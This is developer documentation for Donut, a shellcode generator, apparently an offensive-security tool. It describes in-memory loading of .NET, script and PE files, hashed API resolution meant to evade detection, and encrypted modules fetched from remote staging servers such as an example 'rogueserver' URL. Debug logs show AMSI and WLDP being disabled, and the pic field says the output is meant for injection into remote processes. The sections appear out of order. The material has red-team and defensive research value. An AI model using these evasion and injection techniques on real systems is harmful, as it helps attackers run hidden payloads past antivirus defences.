249 PDONUT_MODULE p<span style='color:#800080; '>;</span> <span style='color:#696969; '>// for URL</span>
250 DONUT_MODULE x<span style='color:#800080; '>;</span> <span style='color:#696969; '>// for PIC</span>
251 <span style='color:#800080; '>}</span> module<span style='color:#800080; '>;</span>
252 <span style='color:#800080; '>}</span> DONUT_INSTANCE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_INSTANCE<span style='color:#800080; '>;</span>
253 </pre>
254
255 <h3>Module</h3>
256
257 <p>Modules can be embedded in an <var>Instance</var> or stored on a remote HTTP server.</p>
258
259 <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// everything required for a module goes in the following structure</span>
260 <span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_MODULE <span style='color:#800080; '>{</span>
261 <span style='color:#603000; '>DWORD</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// EXE, DLL, JS, VBS, XSL</span>
262 <span style='color:#603000; '>WCHAR</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version for .NET EXE/DLL</span>
263 <span style='color:#603000; '>WCHAR</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// domain name to use for .NET EXE/DLL</span>
264 <span style='color:#603000; '>WCHAR</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace for .NET EXE/DLL</span>
265 <span style='color:#603000; '>WCHAR</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to invoke for .NET DLL or api for unmanaged DLL</span>
266 <span style='color:#603000; '>DWORD</span> param_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// number of parameters for DLL/EXE</span>
267 <span style='color:#603000; '>WCHAR</span> param<span style='color:#808030; '>[</span>DONUT_MAX_PARAM<span style='color:#808030; '>]</span><span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters for DLL/EXE</span>
268 <span style='color:#603000; '>CHAR</span> sig<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// random string to verify decryption</span>
269 ULONG64 mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// to verify decryption was ok</span>
270 ULONG64 len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of EXE/DLL/XSL/JS/VBS file</span>
271 <span style='color:#603000; '>BYTE</span> data<span style='color:#808030; '>[</span><span style='color:#008c00; '>4</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// data of EXE/DLL/XSL/JS/VBS file</span>
272 <span style='color:#800080; '>}</span> DONUT_MODULE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_MODULE<span style='color:#800080; '>;</span>
273 </pre>
274
275 <h3>API Hashing</h3>
276
277 <p>A hash function called <em>Maru</em> is used to resolve the address of API at runtime. It uses a Davies-Meyer construction and the SPECK block cipher to derive a 64-bit hash from an API string. The padding is similar to what's used by MD4 and MD5 except only 32-bits of the string length are stored in the buffer instead of 64-bits. An initial value (IV) chosen randomly ensures the 64-bit API hashes are unique for each instance and cannot be used for detection of Donut. Future releases will likely support alternative methods of resolving address of API to decrease chance of detection.</p>
278
279 <h3>Encryption</h3>
280
281 <p>The following structure is used to hold a master key, counter and nonce for Donut, which are generated randomly.</p>
282
283 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CRYPT <span style='color:#800080; '>{</span>
284 <span style='color:#603000; '>BYTE</span> mk<span style='color:#808030; '>[</span>DONUT_KEY_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// master key</span>
285 <span style='color:#603000; '>BYTE</span> ctr<span style='color:#808030; '>[</span>DONUT_BLK_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// counter + nonce</span>
286 <span style='color:#800080; '>}</span> DONUT_CRYPT<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CRYPT<span style='color:#800080; '>;</span>
287 </pre>
288
289 <p>Chaskey, a 128-bit block cipher with support for 128-bit keys, is used in Counter (CTR) mode to decrypt a <var>Module</var> or an <var>Instance</var> at runtime. If an adversary discovers a staging server, it should not be feasible for them to decrypt a donut module without the key which is stored in the donut payload. </p>
290
291 <h3>Debugging payload</h3>
292
293 <p>The payload is capable of displaying detailed information about each step executing a file in-memory and can be useful in tracking down bugs. To build a debug-enabled executable, specify the debug label with nmake/make for both donut.c and payload.c.</p>
294
295 <pre>
296 nmake debug -f Makefile.msvc
297 make debug -f Makefile.mingw
298 </pre>
299
300 <p>Use donut to create a payload as you normally would and a file called <code>instance</code> will be saved to disk.</p>
301
302 <pre>
303 c:\hub\donut>donut -fClass1.dll -cTestClass -mRunProcess -pcalc.exe,notepad.exe
304
305 [ Donut shellcode generator v0.9.2
306 [ Copyright (c) 2019 TheWover, Odzhan
307
308 DEBUG: donut.c:822:DonutCreate(): Entering.
309 DEBUG: donut.c:824:DonutCreate(): Validating configuration and path of file
310 DEBUG: donut.c:840:DonutCreate(): Validating instance type
311 DEBUG: donut.c:880:DonutCreate(): Validating architecture
312 DEBUG: donut.c:277:get_file_info(): Entering.
313 DEBUG: donut.c:286:get_file_info(): Checking extension of Class1.dll
314 DEBUG: donut.c:293:get_file_info(): Extension is ".dll"
315 DEBUG: donut.c:320:get_file_info(): Module is DLL
316 DEBUG: donut.c:327:get_file_info(): Mapping Class1.dll into memory
317 DEBUG: donut.c:222:map_file(): Reading size of file : Class1.dll
318 DEBUG: donut.c:231:map_file(): Opening Class1.dll
319 DEBUG: donut.c:241:map_file(): Mapping 3072 bytes for Class1.dll
320 DEBUG: donut.c:336:get_file_info(): Checking DOS header
321 DEBUG: donut.c:342:get_file_info(): Checking NT header
322 DEBUG: donut.c:348:get_file_info(): Checking IMAGE_DATA_DIRECTORY
323 DEBUG: donut.c:356:get_file_info(): Checking characteristics
324 DEBUG: donut.c:368:get_file_info(): COM Directory found
325 DEBUG: donut.c:384:get_file_info(): Runtime version : v4.0.30319
326 DEBUG: donut.c:395:get_file_info(): Leaving.
327 DEBUG: donut.c:944:DonutCreate(): Creating module
328 DEBUG: donut.c:516:CreateModule(): Entering.
329 DEBUG: donut.c:520:CreateModule(): Allocating 9504 bytes of memory for DONUT_MODULE
330 DEBUG: donut.c:544:CreateModule(): Domain : TPYTXT7T
331 DEBUG: donut.c:549:CreateModule(): Class : TestClass
332 DEBUG: donut.c:552:CreateModule(): Method : RunProcess
333 DEBUG: donut.c:559:CreateModule(): Runtime : v4.0.30319
334 DEBUG: donut.c:584:CreateModule(): Adding "calc.exe"
335 DEBUG: donut.c:584:CreateModule(): Adding "notepad.exe"
336 DEBUG: donut.c:610:CreateModule(): Leaving.
337 DEBUG: donut.c:951:DonutCreate(): Creating instance
338 DEBUG: donut.c:621:CreateInstance(): Entering.
339 DEBUG: donut.c:624:CreateInstance(): Allocating space for instance
340 DEBUG: donut.c:631:CreateInstance(): The size of module is 9504 bytes. Adding to size of instance.
341 DEBUG: donut.c:643:CreateInstance(): Generating random key for instance
342 DEBUG: donut.c:649:CreateInstance(): Generating random key for module
343 DEBUG: donut.c:655:CreateInstance(): Generating random string to verify decryption
344 DEBUG: donut.c:661:CreateInstance(): Generating random IV for Maru hash
345 DEBUG: donut.c:666:CreateInstance(): Generating hashes for API using IV: 59e4ea34bad26f10
346 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : LoadLibraryA = 710C9DA8846AE821
347 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetProcAddress = 2334B1630D3B9C85
348 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetModuleHandleA = 5389E01382E0391
349 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualAlloc = 51EE6B0DB215095E
350 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualFree = F55A2169F30A6ED4
351 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualQuery = 22DB7628044F6E32
352 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualProtect = 688AA07FEF250016
353 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : Sleep = 5BF1C1B408CCA4A5
354 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : MultiByteToWideChar = 438AD242BBBC755
355 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetUserDefaultLCID = 33ED1B2C1A2F9EC7
356 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreate = 78AD2BFB55A5E7ED
357 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreateVector = 539F6582DE26F7BC
358 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayPutElement = 5057AD641F749DA0
359 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayDestroy = A63C510FF032080E
360 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetLBound = A37979CE2EEDDA6
361 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetUBound = 64A9C62452B8653C
362 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysAllocString = BFEEAAB6CE6017FB
363 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysFreeString = E6FD34B03A2701F6
364 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : LoadTypeLib = 2A33214873ADC58C
365 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCrackUrlA = 1ADE3553184C68E1
366 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetOpenA = 1DEDE3D32F2FCD3
367 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetConnectA = 781FD6B18C99CAD2
368 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetSetOptionA = 13EC8A292778FC3F
369 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetReadFile = 8D16E60E7C2E582A
370 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCloseHandle = C28E8A3AABB2A755
371 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpOpenRequestA = 6C5189610A8545F5
372 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpSendRequestA = 4DFA0D985988D31
373 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpQueryInfoA = ED09A37256B27F04
374 DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CorBindToRuntime = FD669FABED4C6B7
375 DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CLRCreateInstance = 56B7AC5C110570B5
376 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoInitializeEx = 3733F4734D12D7C
377 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoCreateInstance = FCB3EAC51E43319B
378 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoUninitialize = 908A347B45C6E4A2
379 DEBUG: donut.c:694:CreateInstance(): Copying GUID structures and DLL strings for loading .NET assemblies
380 DEBUG: donut.c:791:CreateInstance(): Copying module data to instance
381 DEBUG: donut.c:796:CreateInstance(): encrypting instance
382 DEBUG: donut.c:808:CreateInstance(): Leaving.
383 DEBUG: donut.c:959:DonutCreate(): Saving instance to file
384 DEBUG: donut.c:992:DonutCreate(): PIC size : 33050
385 DEBUG: donut.c:999:DonutCreate(): Inserting opcodes
386 DEBUG: donut.c:1035:DonutCreate(): Copying 15218 bytes of x86 + amd64 shellcode
387 DEBUG: donut.c:259:unmap_file(): Unmapping
388 DEBUG: donut.c:262:unmap_file(): Closing
389 DEBUG: donut.c:1061:DonutCreate(): Leaving.
390 [ Instance type : PIC
391 [ Module file : "Class1.dll"
392 [ File type : .NET DLL
393 [ Class : TestClass
394 [ Method : RunProcess
395 [ Parameters : calc.exe,notepad.exe
396 [ Target CPU : x86+AMD64
397 [ Shellcode : "payload.bin"
398
399 DEBUG: donut.c:1069:DonutDelete(): Entering.
400 DEBUG: donut.c:1088:DonutDelete(): Leaving.
401 </pre>
402
403 <p>Pass the instance as a parameter to payload.exe and it will run on the host system as if in a target environment.</p>
404
405 <pre>
406 c:\hub\donut\payload>payload ..\instance
407 Running...
408 DEBUG: payload.c:45:ThreadProc(): Maru IV : 1899033E0863343E
409 DEBUG: payload.c:48:ThreadProc(): Resolving address for VirtualAlloc() : 9280348A6A2AFA7
410 DEBUG: payload.c:52:ThreadProc(): Resolving address for VirtualAlloc() : 3A49032E4107D985
411 DEBUG: payload.c:61:ThreadProc(): VirtualAlloc : 77535ED0 VirtualFree : 77535EF0
412 DEBUG: payload.c:63:ThreadProc(): Allocating 17800 bytes of RW memory
413 DEBUG: payload.c:70:ThreadProc(): Copying 17800 bytes of data to memory 008D0000
414 DEBUG: payload.c:74:ThreadProc(): Zero initializing PDONUT_ASSEMBLY
415 DEBUG: payload.c:82:ThreadProc(): Decrypting 17800 bytes of instance
416 DEBUG: payload.c:89:ThreadProc(): Generating hash to verify decryption
417 DEBUG: payload.c:91:ThreadProc(): Instance : c16c69caa83fb13f | Result : c16c69caa83fb13f
418 DEBUG: payload.c:98:ThreadProc(): Resolving LoadLibraryA
419 DEBUG: payload.c:104:ThreadProc(): Loading ole32.dll ...
420 DEBUG: payload.c:104:ThreadProc(): Loading oleaut32.dll ...
421 DEBUG: payload.c:104:ThreadProc(): Loading wininet.dll ...
422 DEBUG: payload.c:104:ThreadProc(): Loading mscoree.dll ...
423 DEBUG: payload.c:108:ThreadProc(): Resolving 33 API
424 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 066A0ED9815D3C92
425 DEBUG: payload.c:111:ThreadProc(): Resolving API address for F3569749C64E1DA5
426 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09280348A6A2AFA7
427 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3A49032E4107D985
428 DEBUG: payload.c:111:ThreadProc(): Resolving API address for FDE50FEB629EB834
429 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4A4C764EFA89A84F
430 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5D388BA18E017E53
431 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4EA2B25D8FAABD2B
432 DEBUG: payload.c:111:ThreadProc(): Resolving API address for F1D278132E49F050
433 DEBUG: payload.c:111:ThreadProc(): Resolving API address for D05386A0F8FF7CAD
434 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8121B63764A390A6
435 DEBUG: payload.c:111:ThreadProc(): Resolving API address for EB2BFAA408124470
436 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 11B666F77E7303F6
437 DEBUG: payload.c:111:ThreadProc(): Resolving API address for E8BD6B7A99981E38
438 DEBUG: payload.c:111:ThreadProc(): Resolving API address for DE78E211DE61998B
439 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09D967C5479A0F9F
440 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6CA1D167C2BFFA9A
441 DEBUG: payload.c:111:ThreadProc(): Resolving API address for AD11F6324A205C5E
442 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5EAEF345362A2811
443 DEBUG: payload.c:111:ThreadProc(): Resolving API address for A0CC0DC36E8EDD2C
444 DEBUG: payload.c:111:ThreadProc(): Resolving API address for A4241EDCC8B14F85
445 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 756CEB8FF481A72E
446 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8116A255193A09CA
447 DEBUG: payload.c:111:ThreadProc(): Resolving API address for AB14A786531404A1
448 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 1CF4A93D6896380A
449 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 61B393CC2DE33733
450 DEBUG: payload.c:111:ThreadProc(): Resolving API address for ADAF62D44179684A
451 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 7F9591B7380CD749
452 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3CC76B29D676544F
453 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 725AA978FD2B1255
454 DEBUG: peb.c:87:FindExport(): 725aa978fd2b1255 is forwarded to api-ms-win-core-com-l1-1-0.CoInitializeEx
455 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
456 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoInitializeEx)
457 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6C0F670F3C85A407
458 DEBUG: peb.c:87:FindExport(): 6c0f670f3c85a407 is forwarded to api-ms-win-core-com-l1-1-0.CoCreateInstance
459 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
460 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoCreateInstance)
461 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 2996694CA69B44E8
462 DEBUG: peb.c:87:FindExport(): 2996694ca69b44e8 is forwarded to api-ms-win-core-com-l1-1-0.CoUninitialize
463 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
464 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoUninitialize)
465 DEBUG: payload.c:127:ThreadProc(): Using module embedded in instance
466 DEBUG: inmem_dotnet.c:43:LoadAssembly(): Using module embedded in instance
467 DEBUG: inmem_dotnet.c:51:LoadAssembly(): CLRCreateInstance
468 DEBUG: inmem_dotnet.c:59:LoadAssembly(): ICLRMetaHost::GetRuntime("v4.0.30319")
469 DEBUG: inmem_dotnet.c:66:LoadAssembly(): ICLRRuntimeInfo::IsLoadable
470 DEBUG: inmem_dotnet.c:70:LoadAssembly(): ICLRRuntimeInfo::GetInterface
471 DEBUG: inmem_dotnet.c:78:LoadAssembly(): HRESULT: 00000000
472 DEBUG: inmem_dotnet.c:100:LoadAssembly(): ICorRuntimeHost::Start
473 DEBUG: inmem_dotnet.c:107:LoadAssembly(): ICorRuntimeHost::CreateDomain("TP7WFT9M")
474 DEBUG: inmem_dotnet.c:115:LoadAssembly(): IUnknown::QueryInterface
475 DEBUG: bypass.c:83:DisableAMSI(): Length of AmsiScanBuffer stub is 32 bytes.
476 DEBUG: bypass.c:89:DisableAMSI(): Overwriting AmsiScanBuffer
477 DEBUG: bypass.c:104:DisableAMSI(): Length of AmsiScanString stub is -16 bytes.
478 DEBUG: inmem_dotnet.c:123:LoadAssembly(): DisableAMSI OK
479 DEBUG: inmem_dotnet.c:127:LoadAssembly(): DisableWLDP OK
480 DEBUG: inmem_dotnet.c:134:LoadAssembly(): Copying 3072 bytes of assembly to safe array
481 DEBUG: inmem_dotnet.c:140:LoadAssembly(): AppDomain::Load_3
482 DEBUG: inmem_dotnet.c:147:LoadAssembly(): HRESULT : 00000000
483 DEBUG: inmem_dotnet.c:149:LoadAssembly(): Erasing assembly from memory
484 DEBUG: inmem_dotnet.c:155:LoadAssembly(): SafeArrayDestroy
485 DEBUG: inmem_dotnet.c:176:RunAssembly(): Using module embedded in instance
486 DEBUG: inmem_dotnet.c:184:RunAssembly(): Type is DLL
487 DEBUG: inmem_dotnet.c:255:RunAssembly(): SysAllocString("TestClass")
488 DEBUG: inmem_dotnet.c:259:RunAssembly(): SysAllocString("RunProcess")
489 DEBUG: inmem_dotnet.c:263:RunAssembly(): Assembly::GetType_2
490 DEBUG: inmem_dotnet.c:269:RunAssembly(): SafeArrayCreateVector(2 parameter(s))
491 DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "calc.exe" as parameter 1
492 DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "notepad.exe" as parameter 2
493 DEBUG: inmem_dotnet.c:292:RunAssembly(): Calling Type::InvokeMember_3
494 DEBUG: inmem_dotnet.c:306:RunAssembly(): Type::InvokeMember_3 : 00000000 : Success
495 DEBUG: inmem_dotnet.c:323:FreeAssembly(): Type::Release
496 DEBUG: inmem_dotnet.c:335:FreeAssembly(): Assembly::Release
497 DEBUG: inmem_dotnet.c:341:FreeAssembly(): AppDomain::Release
498 DEBUG: inmem_dotnet.c:347:FreeAssembly(): IUnknown::Release
499 DEBUG: inmem_dotnet.c:353:FreeAssembly(): ICorRuntimeHost::Stop
500 DEBUG: inmem_dotnet.c:356:FreeAssembly(): ICorRuntimeHost::Release
501 DEBUG: inmem_dotnet.c:362:FreeAssembly(): ICLRRuntimeInfo::Release
502 DEBUG: inmem_dotnet.c:368:FreeAssembly(): ICLRMetaHost::Release
503 DEBUG: payload.c:171:ThreadProc(): Erasing RW memory for instance
504 DEBUG: payload.c:174:ThreadProc(): Releasing RW memory for instance
505 </pre>
506
507 <p>Obviously you should be cautious with what files you decide to execute on your machine.</p>
508
509 </body>
510 </html>
0
1 <html>
2 <body>
3
4 <h3>API</h3>
5
6 <ul>
7 <li><code>int DonutCreate(PDONUT_CONFIG pConfig)</code></li>
8 <li><code>int DonutDelete(PDONUT_CONFIG pConfig)</code></li>
9 </ul>
10
11 <p>When provided with a valid configuration, <code>DonutCreate</code> will generate a shellcode to execute a VBS/JS/EXE/DLL or XSL files in-memory. If the function returns <code>DONUT_ERROR_SUCCESS</code>, the configuration will contain three components:</p>
12
13 <ol>
14 <li>An encrypted <var>Instance</var></li>
15 <li>An encrypted <var>Module</var></li>
16 <li>A position-independent code (PIC) or shellcode with <var>Instance</var> embedded in it.</li>
17 </ol>
18
19 <p>The key to decrypt the <var>Module</var> is stored in the <var>Instance</var> so that if a module is discovered on a staging server by an adversary, it should not be possible to decrypt the contents without the instance. <code>DonutDelete</code> will release any memory allocated by a successful call to <code>DonutCreate</code>. The <var>Instance</var> will already be attached to the PIC ready for executing in-memory, but the module may require saving to disk if the PIC will retrieve it from a remote staging server.</p>
20
21 <h3>Configuration</h3>
22
23 <p>A configuration requires a target architecture (only x86 and x86-64 are currently supported), a path to a VBS/JS/EXE/DLL or XML file that will be executed in-memory by the shellcode, a namespace/class for a .NET assembly, including the name of a method to invoke and any parameters passed to the method. If the module will be stored on a staging server, a URL is required, but not a module name because that will be generated randomly.</p>
24
25 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CONFIG <span style='color:#800080; '>{</span>
26 <span style='color:#800000; font-weight:bold; '>int</span> arch<span style='color:#800080; '>;</span> <span style='color:#696969; '>// target architecture for shellcode </span>
27 <span style='color:#800000; font-weight:bold; '>char</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of domain to create for assembly</span>
28 <span style='color:#800000; font-weight:bold; '>char</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace</span>
29 <span style='color:#800000; font-weight:bold; '>char</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to execute</span>
30 <span style='color:#800000; font-weight:bold; '>char</span> param<span style='color:#808030; '>[</span><span style='color:#808030; '>(</span>DONUT_MAX_PARAM<span style='color:#808030; '>+</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>)</span><span style='color:#808030; '>*</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters passed to method, separated by comma or semi-colon</span>
31 <span style='color:#800000; font-weight:bold; '>char</span> file<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// assembly to create module from </span>
32 <span style='color:#800000; font-weight:bold; '>char</span> url<span style='color:#808030; '>[</span>DONUT_MAX_URL<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to root path of where module will be on remote http server</span>
33 <span style='color:#800000; font-weight:bold; '>char</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version to use.</span>
34 <span style='color:#800000; font-weight:bold; '>char</span> modname<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of module written to disk</span>
35
36 <span style='color:#800000; font-weight:bold; '>int</span> mod_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// .NET EXE/DLL, VBS,JS,EXE,DLL,XSL</span>
37 uint64_t mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_MODULE</span>
38 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>mod<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to donut module</span>
39
40 <span style='color:#800000; font-weight:bold; '>int</span> inst_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL</span>
41 uint64_t inst_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_INSTANCE</span>
42 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>inst<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to donut instance</span>
43
44 uint64_t pic_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of shellcode</span>
45 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>pic<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to PIC/shellcode</span>
46 <span style='color:#800080; '>}</span> DONUT_CONFIG<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CONFIG<span style='color:#800080; '>;</span>
47 </pre>
48
49 <table border="1">
50 <tr>
51 <th>Member</th>
52 <th>Description</th>
53 </tr>
54 <tr>
55 <td><code>arch</code></td>
56 <td>Indicates the type of assembly code to generate. <code>DONUT_ARCH_X86</code> and <code>DONUT_ARCH_X64</code> are self-explanatory. <code>DONUT_ARCH_X84</code> indicates dual-mode that combines shellcode for both x86 and amd64. ARM64 will be supported at some point.</td>
57 </tr>
58 <tr>
59 <td><code>domain</code></td>
60 <td>AppDomain name to create. If one is not specified by the caller, it will be generated randomly.</td>
61 </tr>
62 <tr>
63 <td><code>cls</code></td>
64 <td>The class name with method to invoke. A namespace is optional. e.g: <var>namespace.class</var></td>
65 </tr>
66 <tr>
67 <td><code>method</code></td>
68 <td>The method that will be invoked by the shellcode once a .NET assembly is loaded into memory. This also holds the name of an exported API if the module is an unmanaged DLL.</td>
69 </tr>
70 <tr>
71 <td><code>param</code></td>
72 <td>Contains a list of parameters for the .NET method or DLL function. Each separated by semi-colon or comma.</td>
73 </tr>
74 <tr>
75 <td><code>file</code></td>
76 <td>The path of a supported file type: VBS/JS/EXE/DLL or XSL.</td>
77 </tr>
78 <tr>
79 <td><code>url</code></td>
80 <td>If <code>inst_type</code> is <code>DONUT_INSTANCE_URL</code>, this should contain the server and path of where the module will be stored, e.g: https://www.rogueserver.com/modules/. The payload fetches the module from this location at runtime, so the staging server must be reachable from the target.</td>
81 </tr>
82 <tr>
83 <td><code>runtime</code></td>
84 <td>The CLR runtime version to use for the .NET assembly. If none is provided, donut will try to read it from the assembly's CLR metadata header. If that fails, v4.0.30319 is used by default.</td>
85 </tr>
86 <tr>
87 <td><code>modname</code></td>
88 <td>If <code>inst_type</code> is <code>DONUT_INSTANCE_URL</code>, this will contain a randomly generated name for the module that should be used when saving the contents of <code>mod</code> to disk.</td>
89 </tr>
90 <tr>
91 <td><code>mod_type</code></td>
92 <td>Indicates the type of file detected by <code>DonutCreate</code>. For example, <code>DONUT_MODULE_VBS</code> indicates a VBScript file.</td>
93 </tr>
94 <tr>
95 <td><code>mod_len</code></td>
96 <td>The total size of the <var>Module</var> pointed to by <code>mod</code>.</td>
97 </tr>
98 <tr>
99 <td><code>mod</code></td>
100 <td>Points to the encrypted <var>Module</var>. If <code>inst_type</code> is <code>DONUT_INSTANCE_URL</code>, this should be saved to a file named <code>modname</code> and made accessible via the HTTP server at <code>url</code>.</td>
101 </tr>
102 <tr>
103 <td><code>inst_type</code></td>
104 <td><code>DONUT_INSTANCE_PIC</code> indicates a self-contained payload, meaning the module (e.g. a .NET assembly) is embedded in the executable code. <code>DONUT_INSTANCE_URL</code> indicates the module is stored on a remote server, with the URL embedded in the instance.</td>
105 </tr>
106 <tr>
107 <td><code>inst_len</code></td>
108 <td>The total size of the <var>Instance</var> pointed to by <code>inst</code>.</td>
109 </tr>
110 <tr>
111 <td><code>inst</code></td>
112 <td>Points to an encrypted <var>Instance</var> after a successful call to <code>DonutCreate</code>. Since it's already attached to the <code>pic</code>, this is only provided for debugging purposes.</td>
113 </tr>
114 <tr>
115 <td><code>pic_len</code></td>
116 <td>The size of data pointed to by <code>pic</code>.</td>
117 </tr>
118 <tr>
119 <td><code>pic</code></td>
120 <td>Points to executable code for the target architecture which also contains an instance. This should be injected into a remote process.</td>
121 </tr>
122 </table>
123
